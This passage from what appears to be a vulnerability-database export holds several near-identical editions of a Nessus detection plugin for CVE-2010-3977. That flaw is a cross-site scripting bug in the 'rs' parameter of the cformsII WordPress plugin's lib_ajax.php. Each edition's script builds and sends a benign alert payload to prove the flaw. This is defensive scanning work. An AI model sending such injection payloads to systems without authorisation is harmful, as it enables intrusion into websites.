callable'\n);\nif (!vuln)\n audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\");\n", "naslFamily": "CGI abuses : XSS", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2018-07-03T10:05:31", "differentElements": ["cvss", "description", "href", "modified", "references", "reporter", "sourceData"], "edition": 3}, {"bulletin": {"id": "CFORMS_RS_XSS.NASL", "hash": "a8de340634863185583a5dc54e5568fd5b7a2d8a40bd806b3ac104235d884486", "type": "nessus", "bulletinFamily": "scanner", "title": "cformsII Plugin for WordPress 'rs' Parameter XSS", "description": "The version of the cformsII plugin for WordPress hosted on the remote\nweb server fails to sanitize user-supplied input to the ", "published": "2010-11-08T00:00:00", "modified": "2019-10-02T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/50512", "reporter": "This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.securityfocus.com/archive/1/514579/30/0/threaded"], "cvelist": ["CVE-2010-3977"], "immutableFields": [], "lastseen": "2019-10-28T20:02:57", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"modified": "2019-10-28T20:02:57", "references": [{"idList": ["SSV:20225"], "type": "seebug"}, {"idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310801628"], "type": "openvas"}, {"idList": ["EDB-ID:34946"], "type": "exploitdb"}, {"idList": ["CVE-2010-3977"], "type": "cve"}, {"idList": ["WPVDB-ID:8782"], "type": "wpvulndb"}, {"idList": ["PACKETSTORM:95395"], "type": "packetstorm"}, {"idList": ["JVN:35256978"], "type": "jvn"}]}, "score": {"modified": "2019-10-28T20:02:57", "value": 5.9, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "50512", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50512);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/15 20:50:19\");\n\n script_cve_id(\"CVE-2010-3977\");\n script_bugtraq_id(44587);\n script_xref(name:\"Secunia\", value:\"42006\");\n\n script_name(english:\"cformsII Plugin for WordPress 'rs' Parameter XSS\");\n script_summary(english:\"Attempts to inject script code via lib_ajax.php.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is vulnerable to a\ncross-site scripting attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the cformsII plugin for WordPress hosted on the remote\nweb server fails to sanitize user-supplied input to the 'rs' parameter\nof the 'lib_ajax.php' script before using it to generate dynamic HTML\noutput.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script\ncode into a user's browser to be executed within the security context\nof the affected site.\n\nNote that the install is also likely to be vulnerable to a similar\ncross-site scripting attack involving the 'rsargs' parameter, although\nNessus has not checked for this particular issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/514579/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Unknown at this time.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"cformsII\";\n\n# Check KB first\ninstalled = get_kb_item(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nif (!installed)\n{\n checks = make_array();\n path = \"/wp-content/plugins/\";\n checks[path + \"cforms/js/cforms.js\"][0] = make_list('var sajax_');\n\n # Ensure plugin is installed\n installed = check_webapp_ext(\n checks : checks,\n dir : dir,\n port : port,\n ext : plugin\n );\n}\nif (!installed)\n audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + \" plugin\");\n\n# Try to exploit the issue.\npayload = SCRIPT_NAME;\nenc_payload = '';\nfor(i=0; i<strlen(payload); i++)\n{\n enc_payload += ord(payload[i]) + ',';\n}\nenc_payload = substr(enc_payload, 0, strlen(enc_payload) - 2);\nalert = '<script>alert(String.fromCharCode('+enc_payload+'))</script>';\n\nvuln = test_cgi_xss(\n port : port,\n cgi : '/wp-content/plugins/cforms/lib_ajax.php',\n dirs : make_list(dir),\n qs : 'rs='+urlencode(str:alert),\n pass_str : '-:' + alert + ' not callable',\n pass2_re : ' not callable'\n);\nif (!vuln)\n audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\");\n", "naslFamily": "CGI abuses : XSS", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2019-10-28T20:02:57", "differentElements": ["description", "modified", "reporter", "sourceData"], "edition": 4}, {"bulletin": {"id": "CFORMS_RS_XSS.NASL", "hash": "deed7a78df6ba6b9766637288fcc686be4ece82aa714621686941f97bea29550", "type": "nessus", "bulletinFamily": "scanner", "title": "cformsII Plugin for WordPress 'rs' Parameter XSS", "description": "The version of the cformsII plugin for WordPress hosted on the remote\nweb server fails to sanitize user-supplied input to the 'rs' parameter\nof the 'lib_ajax.php' script before using it to generate dynamic HTML\noutput.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script\ncode into a user's browser to be executed within the security context\nof the affected site.\n\nNote that the install is also likely to be vulnerable to a similar\ncross-site scripting attack involving the 'rsargs' parameter, although\nNessus has not checked for this particular issue.", "published": "2010-11-08T00:00:00", "modified": "2010-11-08T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/50512", "reporter": "This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.securityfocus.com/archive/1/514579/30/0/threaded"], "cvelist": ["CVE-2010-3977"], "immutableFields": [], "lastseen": "2021-01-20T09:36:16", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"modified": "2021-01-20T09:36:16", "references": [{"idList": ["SSV:20225"], "type": "seebug"}, {"idList": ["WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B"], "type": "wpvulndb"}, {"idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310801628"], "type": "openvas"}, {"idList": ["EDB-ID:34946"], "type": "exploitdb"}, {"idList": ["CVE-2010-3977"], "type": "cve"}, {"idList": ["PACKETSTORM:95395"], "type": "packetstorm"}, {"idList": ["JVN:35256978"], "type": "jvn"}], "rev": 2}, "score": {"modified": "2021-01-20T09:36:16", "rev": 2, "value": 5.8, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "50512", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50512);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-3977\");\n script_bugtraq_id(44587);\n script_xref(name:\"Secunia\", value:\"42006\");\n\n script_name(english:\"cformsII Plugin for WordPress 'rs' Parameter XSS\");\n script_summary(english:\"Attempts to inject script code via lib_ajax.php.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is vulnerable to a\ncross-site scripting attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the cformsII plugin for WordPress hosted on the remote\nweb server fails to sanitize user-supplied input to the 'rs' parameter\nof the 'lib_ajax.php' script before using it to generate dynamic HTML\noutput.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script\ncode into a user's browser to be executed within the security context\nof the affected site.\n\nNote that the install is also likely to be vulnerable to a similar\ncross-site scripting attack involving the 'rsargs' parameter, although\nNessus has not checked for this particular issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/514579/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Unknown at this time.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"cformsII\";\n\n# Check KB first\ninstalled = get_kb_item(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nif (!installed)\n{\n checks = make_array();\n path = \"/wp-content/plugins/\";\n checks[path + \"cforms/js/cforms.js\"][0] = make_list('var sajax_');\n\n # Ensure plugin is installed\n installed = check_webapp_ext(\n checks : checks,\n dir : dir,\n port : port,\n ext : plugin\n );\n}\nif (!installed)\n audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + \" plugin\");\n\n# Try to exploit the issue.\npayload = SCRIPT_NAME;\nenc_payload = '';\nfor(i=0; i<strlen(payload); i++)\n{\n enc_payload += ord(payload[i]) + ',';\n}\nenc_payload = substr(enc_payload, 0, strlen(enc_payload) - 2);\nalert = '<script>alert(String.fromCharCode('+enc_payload+'))</script>';\n\nvuln = test_cgi_xss(\n port : port,\n cgi : '/wp-content/plugins/cforms/lib_ajax.php',\n dirs : make_list(dir),\n qs : 'rs='+urlencode(str:alert),\n pass_str : '-:' + alert + ' not callable',\n pass2_re : ' not callable'\n);\nif (!vuln)\n audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\");\n", "naslFamily": "CGI abuses : XSS", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-01-20T09:36:16", "differentElements": ["cvss2"], "edition": 5}, {"bulletin": {"id": "CFORMS_RS_XSS.NASL", "hash": "893e70655d70ed528031e99d33f3a8ef", "type": "nessus", "bulletinFamily": "scanner", "title": "cformsII Plugin for WordPress 'rs' Parameter XSS", "description": "The version of the cformsII plugin for WordPress hosted on the remote\nweb server fails to sanitize user-supplied input to the 'rs' parameter\nof the 'lib_ajax.php' script before using it to generate dynamic HTML\noutput.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script\ncode into a user's browser to be executed within the security context\nof the affected site.\n\nNote that the install is also likely to be vulnerable to a similar\ncross-site scripting attack involving the 'rsargs' parameter, although\nNessus has not checked for this particular issue.", "published": "2010-11-08T00:00:00", "modified": "2010-11-08T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/50512", "reporter": "This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.securityfocus.com/archive/1/514579/30/0/threaded"], "cvelist": ["CVE-2010-3977"], "immutableFields": [], "lastseen": "2021-07-28T22:51:23", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-3977"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11223", "SECURITYVULNS:DOC:25042"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:95395"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801628"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B"]}, {"type": "seebug", "idList": ["SSV:20225"]}, {"type": "exploitdb", "idList": ["EDB-ID:34946"]}, {"type": "jvn", "idList": ["JVN:35256978"]}], "modified": "2021-07-28T22:51:23", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-07-28T22:51:23", "rev": 2}}, "objectVersion": "1.6", "pluginID": "50512", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50512);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-3977\");\n script_bugtraq_id(44587);\n script_xref(name:\"Secunia\", value:\"42006\");\n\n script_name(english:\"cformsII Plugin for WordPress 'rs' Parameter XSS\");\n script_summary(english:\"Attempts to inject script code via lib_ajax.php.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is vulnerable to a\ncross-site scripting attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the cformsII plugin for WordPress hosted on the remote\nweb server fails to sanitize user-supplied input to the 'rs' parameter\nof the 'lib_ajax.php' script before using it to generate dynamic HTML\noutput.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script\ncode into a user's browser to be executed within the security context\nof the affected site.\n\nNote that the install is also likely to be vulnerable to a similar\ncross-site scripting attack involving the 'rsargs' parameter, although\nNessus has not checked for this particular issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/514579/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Unknown at this time.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"cformsII\";\n\n# Check KB first\ninstalled = get_kb_item(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nif (!installed)\n{\n checks = make_array();\n path = \"/wp-content/plugins/\";\n checks[path + \"cforms/js/cforms.js\"][0] = make_list('var sajax_');\n\n # Ensure plugin is installed\n installed = check_webapp_ext(\n checks : checks,\n dir : dir,\n port : port,\n ext : plugin\n );\n}\nif (!installed)\n audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + \" plugin\");\n\n# Try to exploit the issue.\npayload = SCRIPT_NAME;\nenc_payload = '';\nfor(i=0; i<strlen(payload); i++)\n{\n enc_payload += ord(payload[i]) + ',';\n}\nenc_payload = substr(enc_payload, 0, strlen(enc_payload) - 2);\nalert = '<script>alert(String.fromCharCode('+enc_payload+'))</script>';\n\nvuln = test_cgi_xss(\n port : port,\n cgi : '/wp-content/plugins/cforms/lib_ajax.php',\n dirs : make_list(dir),\n qs : 'rs='+urlencode(str:alert),\n pass_str : '-:' + alert + ' not callable',\n pass2_re : ' not callable'\n);\nif (!vuln)\n audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\");\n", "naslFamily": "CGI abuses : XSS", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-28T22:51:23", "differentElements": ["cvss2", "cvss3", "description", "exploitEase", "modified", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 6}, {"bulletin": {"id": "CFORMS_RS_XSS.NASL", "hash": "5ae07a10bc9dcfb2b1e12d7aff029285", "type": "nessus", "bulletinFamily": "scanner", "title": "cformsII Plugin for WordPress 'rs' Parameter XSS", "description": "The version of the cformsII plugin for WordPress hosted on the remote web server fails to sanitize user-supplied input to the 'rs' parameter of the 'lib_ajax.php' script before using it to generate dynamic HTML output.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script code into a user's browser to be executed within the security context of the affected site.\n\nNote that the install is also likely to be vulnerable to a similar cross-site scripting attack involving the 'rsargs' parameter, although Nessus has not checked for this particular issue.", "published": "2010-11-08T00:00:00", "modified": "2021-01-19T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {"score": null, "vector": null}, "href": "https://www.tenable.com/plugins/nessus/50512", "reporter": "This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3977", "https://www.securityfocus.com/archive/1/514579/30/0/threaded"], "cvelist": ["CVE-2010-3977"], "immutableFields": [], "lastseen": "2021-08-11T14:30:58", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-3977"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11223", "SECURITYVULNS:DOC:25042"]}, {"type": "seebug", "idList": ["SSV:20225"]}, {"type": "exploitdb", "idList": ["EDB-ID:34946"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:95395"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801628"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B"]}, {"type": "jvn", "idList": ["JVN:35256978"]}], "modified": "2021-08-11T14:30:58", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-08-11T14:30:58", "rev": 2}}, "objectVersion": "1.6", "pluginID": "50512", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50512);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-3977\");\n script_bugtraq_id(44587);\n script_xref(name:\"Secunia\", value:\"42006\");\n\n script_name(english:\"cformsII Plugin for WordPress 'rs' Parameter XSS\");\n script_summary(english:\"Attempts to inject script code via lib_ajax.php.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is vulnerable to a\ncross-site scripting attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the cformsII plugin for WordPress hosted on the remote\nweb server fails to sanitize user-supplied input to the 'rs' parameter\nof the 'lib_ajax.php' script before using it to generate dynamic HTML\noutput.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script\ncode into a user's browser to be executed within the security context\nof the affected site.\n\nNote that the install is also likely to be vulnerable to a similar\ncross-site scripting attack involving the 'rsargs' parameter, although\nNessus has not checked for this particular issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/514579/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Unknown at this time.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"cformsII\";\n\n# Check KB first\ninstalled = get_kb_item(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nif (!installed)\n{\n checks = make_array();\n path = \"/wp-content/plugins/\";\n checks[path + \"cforms/js/cforms.js\"][0] = make_list('var sajax_');\n\n # Ensure plugin is installed\n installed = check_webapp_ext(\n checks : checks,\n dir : dir,\n port : port,\n ext : plugin\n );\n}\nif (!installed)\n audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + \" plugin\");\n\n# Try to exploit the issue.\npayload = SCRIPT_NAME;\nenc_payload = '';\nfor(i=0; i<strlen(payload); i++)\n{\n enc_payload += ord(payload[i]) + ',';\n}\nenc_payload = substr(enc_payload, 0, strlen(enc_payload) - 2);\nalert = '<script>alert(String.fromCharCode('+enc_payload+'))</script>';\n\nvuln = test_cgi_xss(\n port : port,\n cgi : '/wp-content/plugins/cforms/lib_ajax.php',\n dirs : make_list(dir),\n qs : 'rs='+urlencode(str:alert),\n pass_str : '-:' + alert + ' not callable',\n pass2_re : ' not callable'\n);\nif (!vuln)\n audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\");\n", "naslFamily": "CGI abuses : XSS", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "Unknown at this time.", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {"risk factor": "Low", "score": "3.8"}, "exploitAvailable": false, "exploitEase": "No exploit is required", "patchPublicationDate": null, "vulnerabilityPublicationDate": "2010-10-30T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-11T14:30:58", "differentElements": ["nessusSeverity"], "edition": 7}, {"bulletin": {"id": "CFORMS_RS_XSS.NASL", "hash": "fcfd6279d5f0be4586601414dd8f925c", "type": "nessus", "bulletinFamily": "scanner", "title": "cformsII Plugin for WordPress 'rs' Parameter XSS", "description": "The version of the cformsII plugin for WordPress hosted on the remote web server fails to sanitize user-supplied input to the 'rs' parameter of the 'lib_ajax.php' script before using it to generate dynamic HTML output.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script code into a user's browser to be executed within the security context of the affected site.\n\nNote that the install is also likely to be vulnerable to a similar cross-site scripting attack involving the 'rsargs' parameter, although Nessus has not checked for this particular issue.", "published": "2010-11-08T00:00:00", "modified": "2021-01-19T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {"score": null, "vector": null}, "href": "https://www.tenable.com/plugins/nessus/50512", "reporter": "This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3977", "https://www.securityfocus.com/archive/1/514579/30/0/threaded"], "cvelist": ["CVE-2010-3977"], "immutableFields": [], "lastseen": "2021-08-19T13:02:38", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-3977"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"]}, {"type": "seebug", "idList": ["SSV:20225"]}, {"type": "exploitdb", "idList": ["EDB-ID:34946"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:95395"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801628"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B"]}, {"type": "jvn", "idList": ["JVN:35256978"]}], "modified": "2021-08-19T13:02:38", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-08-19T13:02:38", "rev": 2}}, "objectVersion": "1.6", "pluginID": "50512", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50512);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-3977\");\n script_bugtraq_id(44587);\n script_xref(name:\"Secunia\", value:\"42006\");\n\n script_name(english:\"cformsII Plugin for WordPress 'rs' Parameter XSS\");\n script_summary(english:\"Attempts to inject script code via lib_ajax.php.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is vulnerable to a\ncross-site scripting attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the cformsII plugin for WordPress hosted on the remote\nweb server fails to sanitize user-supplied input to the 'rs' parameter\nof the 'lib_ajax.php' script before using it to 